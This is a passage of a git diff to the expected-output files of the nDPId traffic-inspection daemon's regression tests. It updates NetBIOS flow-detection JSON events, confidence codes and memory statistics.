00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1447772239929,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772239929,"pkt":"\/\/\/\/\/\/\/\/AOCBdSQGCABFAABOZPwAAIARtz8KAARlCgAF\/wCJAIkAOvRglzYBEAABAAAAAAAAIEVPRkdGQ0RKQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1447772248480,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772248480,"pkt":"ABzEEHkPAOCBt8asCABFAABORZkAAIAR1wUKAAXpCgAEGACJAIkAOgf2mjgAAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772251795,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1447772251795,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772251795,"pkt":"ABzEEHkPACFislxDCABFAABOJRwAAH8R\/RQKAAFXCgAEGOJBAIkAOqRfIKgAAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772251795,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772251795,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1447772251795,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1447772251795,"pkt":"ACFislxDABzEEHkPCABFAADLQERAAIARoG8KAAQYCgABVwCJ4kEAt5PzIKiEAAAAAAEAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAEAAAAAAHcER1VOTkFSICAgICAgICAgAAQAVklHSUxBTlRfR1JPVVAgAIQAR1VOTkFSICAgICAgICAgIAQAVklHSUxBTlRfR1JPVVAgHoQAABzEEHkPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1447772211392,"flow_last_seen":1447772269350,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2950,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1447772238479,"flow_last_seen":1447772248481,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221882,"flow_last_seen":1447772239929,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":181,"flow_first_seen":1447772210350,"flow_last_seen":1447772269972,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":9050,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
-00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1447772211392,"flow_last_seen":1447772269350,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2950,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1447772238479,"flow_last_seen":1447772248481,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221882,"flow_last_seen":1447772239929,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":181,"flow_first_seen":1447772210350,"flow_last_seen":1447772269972,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":9050,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","packets-captured":260,"packets-processed":260,"total-skipped-flows":0,"total-l4-payload-len":13727,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":14,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":15,"total-idle-flows":15,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":73,"global_ts_msec":1447772269972} @@ -79,9 +79,9 @@ ~~ total active/idle flows...: 15/15 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5893619 bytes -~~ total memory freed........: 5893619 bytes -~~ total allocations/frees...: 118422/118422 +~~ total memory allocated....: 6027253 bytes +~~ total memory freed........: 6027253 bytes +~~ total allocations/frees...: 121184/121184 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 806 chars diff --git a/test/results/netbios_wildcard_dns_query.pcap.out b/test/results/netbios_wildcard_dns_query.pcap.out index 27708b834..04568b235 100644 --- a/test/results/netbios_wildcard_dns_query.pcap.out +++ b/test/results/netbios_wildcard_dns_query.pcap.out 
@@ -2,7 +2,7 @@ 00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1597866040493} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597866040493,"flow_last_seen":1597866040493,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597866040493,"l3_proto":"ip4","src_ip":"10.1.67.250","dst_ip":"10.1.66.20","src_port":41335,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 